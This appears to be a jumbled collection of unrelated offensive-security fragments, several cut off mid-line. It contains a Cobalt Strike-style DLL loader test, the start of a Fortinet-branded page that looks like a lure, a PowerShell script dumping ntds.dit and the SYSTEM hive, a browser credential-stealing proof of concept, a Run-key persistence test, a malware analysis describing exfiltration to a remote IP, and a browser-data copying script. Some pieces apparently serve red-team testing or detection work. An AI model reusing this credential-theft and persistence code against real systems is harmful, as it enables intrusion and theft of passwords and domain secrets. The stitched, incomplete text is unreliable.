1. Create a Test DLL Loader
Simulate a benign Cobalt Strike-style DLL loader. Save this as test_loader.c:
#include <windows.h>
// Export a function (common in Cobalt Strike loaders)
__declspec(dllexport) void Run(void) {
// Benign test action: create a temporary file
HANDLE hFile = CreateFileA("C:\\Windows\\Temp\\test_ttp_success.txt",
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Fortinet Secure File Access</title>
<style>
body {
margin: 0;
padding: 0;
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
#Requires -RunAsAdministrator
# Define paths
$ntdsPath = "$env:SystemRoot\NTDS\ntds.dit"
$systemHivePath = "$env:SystemRoot\System32\config\SYSTEM"
$desktopPath = [Environment]::GetFolderPath("Desktop")
$outputNTDS = Join-Path $desktopPath "ntds.dit"
$outputSystem = Join-Path $desktopPath "SYSTEM"
# Create Volume Shadow Copy
# raccoon_browser_steal_poc.py
import os
import sqlite3
import shutil
from win32crypt import CryptUnprotectData # pip install pywin32
def find_browser_paths():
paths = [
os.path.expandvars(r"%LOCALAPPDATA%\Google\Chrome\User Data\Default"),
os.path.expandvars(r"%LOCALAPPDATA%\Microsoft\Edge\User Data\Default"),
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
REM Test-only autostart entry: writes a value under the current user's Run key whose command is plain notepad.exe,
REM i.e. the kind of Run-key change that autorun monitoring is meant to surface, without anything harmful launching.
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MS SQL Writer" /t REG_SZ /d "C:\Windows\System32\notepad.exe" /f
REM Read the value back to confirm it was written (the same view a hunt query of this key would get).
reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MS SQL Writer"
REM Remove the test entry again so the test machine is left without the autostart value.
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "MS SQL Writer" /f
Some analysis:
- The script gathers various system details such as the hostname, platform, home directory, and temporary directory (os.hostname(), os.platform(), os.homedir(), os.tmpdir()).
- It checks for the existence of specific directories and files, particularly those related to web browsers like Chrome, Brave, and Opera. It attempts to read these directories and files, which contain potentially sensitive information (e.g., user profiles, extension data).
- It tries to steal macOS keychains and Solana wallet keys.
- The script attempts to upload collected data to a remote server (95.164.17.24) hosted in the Netherlands, indicating data exfiltration. It uses the request module to send POST requests with the stolen data.
- It includes mechanisms to run itself repeatedly, possibly to maintain persistence or continue data exfiltration. The script also tries to download and execute additional payloads from the remote server, which could be more malicious scripts or executables.
# Expected to be set earlier in the calling script:
#   $users_path     - array/collection of user folder names (e.g., @("User1", "User2"))
#   $copy_dest_path - destination root folder (e.g., "D:\Backup\ChromeData")
$copy_dest_path = "C:\Users\Public\EdgeExtract" # adjust to your environment
# Make sure the destination root exists; -Force keeps this idempotent and the
# assignment to $null discards the DirectoryInfo object New-Item would print.
if (!(Test-Path -Path $copy_dest_path)) {
    $null = New-Item -Path $copy_dest_path -ItemType Directory -Force
}